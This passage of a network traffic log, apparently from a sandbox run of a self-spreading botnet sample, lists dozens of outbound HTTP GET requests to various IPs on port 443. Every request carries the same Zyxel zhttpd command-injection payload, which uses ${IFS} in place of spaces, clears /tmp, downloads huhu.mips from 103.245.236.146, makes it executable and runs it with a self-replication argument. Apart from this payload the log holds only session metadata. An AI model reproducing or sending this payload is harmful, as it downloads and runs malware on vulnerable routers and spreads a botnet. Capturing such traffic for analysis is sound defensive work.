                                                Jan 29, 2024 07:07:37.079663992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1564192.168.2.234340638.52.120.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.079696894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1565192.168.2.2352806159.78.246.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.079757929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1566192.168.2.2340542183.159.151.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.079785109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1567192.168.2.2359448122.69.155.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.079837084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1568192.168.2.235053686.179.112.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.079902887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1569192.168.2.2348024220.219.95.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.079914093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1570192.168.2.2335762132.18.198.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.079937935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1571192.168.2.2351784156.202.183.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.079986095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1572192.168.2.233351247.245.180.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.080002069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1573192.168.2.2356820141.78.9.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.080035925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1574192.168.2.2357250166.118.87.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.080069065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1575192.168.2.234950087.66.85.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.080117941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1576192.168.2.2354084136.103.223.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.080149889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1577192.168.2.234216636.33.240.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.080194950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1578192.168.2.2356614158.38.181.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.080224991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1579192.168.2.2347350210.89.142.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.080260038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1580192.168.2.2351488115.106.227.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.080280066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1581192.168.2.234584077.214.18.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.080312967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1582192.168.2.23539941.19.83.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.080348969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1583192.168.2.235935075.254.204.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.080383062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1584192.168.2.234552265.189.186.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.080423117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1585192.168.2.235991018.226.17.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.080451012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1586192.168.2.234541657.238.231.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.080487013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1587192.168.2.235432297.43.96.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.080530882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1588192.168.2.2359636193.90.72.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.080594063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1589192.168.2.2339196161.113.41.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.080598116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1590192.168.2.235510432.176.6.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.080620050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1591192.168.2.234019848.49.80.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.080655098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1592192.168.2.2348290104.97.109.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.080710888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1593192.168.2.2342750218.34.173.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.080739975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1594192.168.2.2354828178.197.116.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.080766916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1595192.168.2.2353668162.12.141.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.080804110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1596192.168.2.2336770174.151.168.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.080835104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1597192.168.2.234050014.10.175.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.080892086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1598192.168.2.234093832.49.233.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.080902100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1599192.168.2.2352466206.49.204.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.080950975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1600192.168.2.234145686.200.233.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.080992937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1601192.168.2.2344064147.180.111.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.081039906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1602192.168.2.234328219.238.238.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.081065893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1603192.168.2.235357690.79.66.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.081095934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1604192.168.2.2354722102.119.172.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.081151009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1605192.168.2.2337018217.23.57.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.081208944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1606192.168.2.2337056209.218.136.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.081245899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1607192.168.2.233439861.252.109.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.081274986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1608192.168.2.2360372174.169.182.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.081301928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1609192.168.2.235717265.66.181.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.081367016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1610192.168.2.234808017.184.129.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.081377983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1611192.168.2.2353282176.138.239.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.081424952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1612192.168.2.234491638.57.106.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.081451893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1613192.168.2.234969857.192.255.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.081502914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1614192.168.2.2355460133.167.91.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.081559896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1615192.168.2.2336862222.177.91.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.081593037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1616192.168.2.234189495.19.118.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.081629038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1617192.168.2.233361050.54.11.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.081671000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1618192.168.2.2348974169.217.10.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.081696033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1619192.168.2.2347258110.147.10.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.081737041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1620192.168.2.2334100210.29.150.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.081784010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1621192.168.2.2353628209.240.11.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.081821918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1622192.168.2.233476262.64.195.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.081854105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1623192.168.2.234360699.204.17.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.081898928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1624192.168.2.233528285.91.113.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.081933022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1625192.168.2.235421272.32.50.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.081953049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1626192.168.2.2360138216.100.146.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.081979036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1627192.168.2.235876825.166.48.119443
                                                TimestampBytes transferredDirectionData
